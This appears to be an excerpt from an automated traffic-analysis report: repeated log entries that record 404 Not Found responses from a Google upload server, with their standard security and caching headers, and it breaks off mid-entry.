      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQFUHouCZrnKkoaErDeSkJyv5vtNJ2qfZRNjOIFl3tu9KhC3ODC7aSnUTuhpTk3UXswContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:17:14 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'nonce-MVpHkghoH7BNIKXY7IHbFA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgSSiKX0-gsKqyBGPLqDsZAR4jzajSLuGOrXyXlTb4e5yjHkUJudtsllSwXG7RhyzhdKContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:17:16 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-4OVcAue2NTF1QYbkvDiw5A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQ9lHkpFS77N4rEgXa6aA49OwJJ-ZQyfmoG2DyD3dq--5Y9SpNi0WUah9H2M1gYXvOIFJrwYXkContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:17:19 GMTContent-Security-Policy: script-src 'nonce-dNBakqSmJ1oFl3fW4VSayQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgRo6JlScXTg9J78hQYE2NSmfkQLdRZa8gVPsiaoWzgt9xCQdrymEhs1tpqahVGLreKmContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:17:21 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'nonce-pR5fGjb_jCgfyoAsbclkmA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgSvGNbaSEG31mUVGYDP7Fkg-exoubnQsTpBJumXH91lr2Qlzyn-WvvOQdn9LyQhJzhrContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:17:23 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-0lwHe3Ad6m7RVn1Fb9VLzg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7LwDHnN5wztW_AYHq2cI0sMnGuhudbvj94l9-uvVET84P0ZXMr3aRMV_oVxRcBdBept_iqLeQContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:17:26 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-gSUTuIqCXvSlkYLUqLgx4A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistCross-Origin-Opener-Policy: same-originContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgTPHlsYCxQBD3XByofZQWkU5v1TPsazJ89RGxp252ILNsba_MXvZblxohrhj1l3KoxhContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:17:28 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-0to7DuxX24XE9i3F2cPFMQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistCross-Origin-Opener-Policy: same-originContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgTCXI2RpCHyS7wW4CS3AQvmV2M-wFk1LE_rCJqmrG31kI_KotDqxZzNnlFv87il8FKV7IwmxeMContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:17:30 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'nonce-4c5VbNs3s2yayQ42twrFaA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgTDd2LXSrTX-FsSt6rvNAsoI1OmBad156y6ASntf6p5_kjNxsz_uEONOyxruF1Do7WQContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:17:33 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-cpcDJH9Oq3Uh8pgUAN6yJw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgRUz2FZIkOfgU2aeRyQlw5lPPsaLEp_bq5g_wWDlyC2Sl1Seo2ZK5Mst5n6l-Yz6chmkiAMhmEContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:17:35 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-ZfsrMncR0JDfXumceUBEVQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgSl9bKnFmla5yI3jftmUGd5Y01uJ_87WEoaqxjNAIiJTBK-u85HW1ZY3hjaiJOk282wContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:17:37 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-vpoGtNTFVBEq09nPPrHhPg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQ-nzvoC-4Y3YrNEtD6IjLPj8vWDW6UeEprxZZPFR_fpsxJH9ZauF2vRGNa4ash7M19P74EslMContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:17:40 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'nonce-PsAKkt8JSluzSuCkRnObUw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgT82xnqDMXBe2NQBSTh0KXnC2SFPzxHYbugdGAhCPmRUN84c0JF2ijRI8qU80jplHR28k_JWm0Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:17:42 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'nonce-psnLVJ-QUzYvu4-bzGkMdA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgR5T5IIBNlAu68id9NUqC8TCjv0seuOtJIzS6MwKA9Hv5G2OqtoT7eu8hVXQX-TOKhWContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:17:44 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-Dp2O-2xiLaCnMIibsL5aCQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgTxSlOmU4DobgMLJHY5ZLRCrtUUgJZTp2ff0-MlYwgJ6caztQ7ZmKKrXMDSA6R7GqQDContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:17:46 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'nonce-ZRvmgYKfVQ5WOzv31RZhNQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; 